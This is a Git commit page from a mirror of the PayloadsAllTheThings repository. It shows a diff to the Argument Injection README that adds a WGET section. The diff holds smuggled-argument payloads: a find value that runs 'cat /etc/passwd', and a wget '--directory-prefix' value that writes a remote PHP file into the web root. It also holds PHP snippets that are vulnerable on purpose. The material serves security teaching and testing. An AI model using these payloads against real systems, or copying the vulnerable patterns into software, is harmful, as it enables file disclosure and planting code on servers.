Backup_Repos/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings synced 2025-12-07 09:23:55 +01:00
Code Issues Projects Releases Wiki Activity

Merge pull request #570 from gdraperi/patch-1

Browse source 
Update README.md
This commit is contained in:
Swissky 2022-10-11 18:49:41 +02:00 committed by GitHub
commit 3392980207
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23
1 changed files with 12 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

13
Argument Injection/README.md
View file

@ -30,8 +30,9 @@ We can see by printing the command that all the parameters are splited allowing
## Summary ## Summary
* [List of exposed commands](#list-of-exposed-commands) * [List of exposed commands](#list-of-exposed-commands)
* [TAR](#TAR)
* [CURL](#CURL) * [CURL](#CURL)
* [TAR](#TAR)
* [FIND](#FIND)
* [WGET](#WGET) * [WGET](#WGET)
* [References](#references) * [References](#references)
@ -81,6 +82,16 @@ $file = "sth -or -exec cat /etc/passwd ; -quit";
system("find /tmp -iname ".escapeshellcmd($file)); system("find /tmp -iname ".escapeshellcmd($file));
``` ```
### WGET
Example of vulnerable code
```php
system(escapeshellcmd('wget '.$url));
```
Arbitrary file write
```php
$url = '--directory-prefix=/var/www/html http://example.com/example.php';
```
## References ## References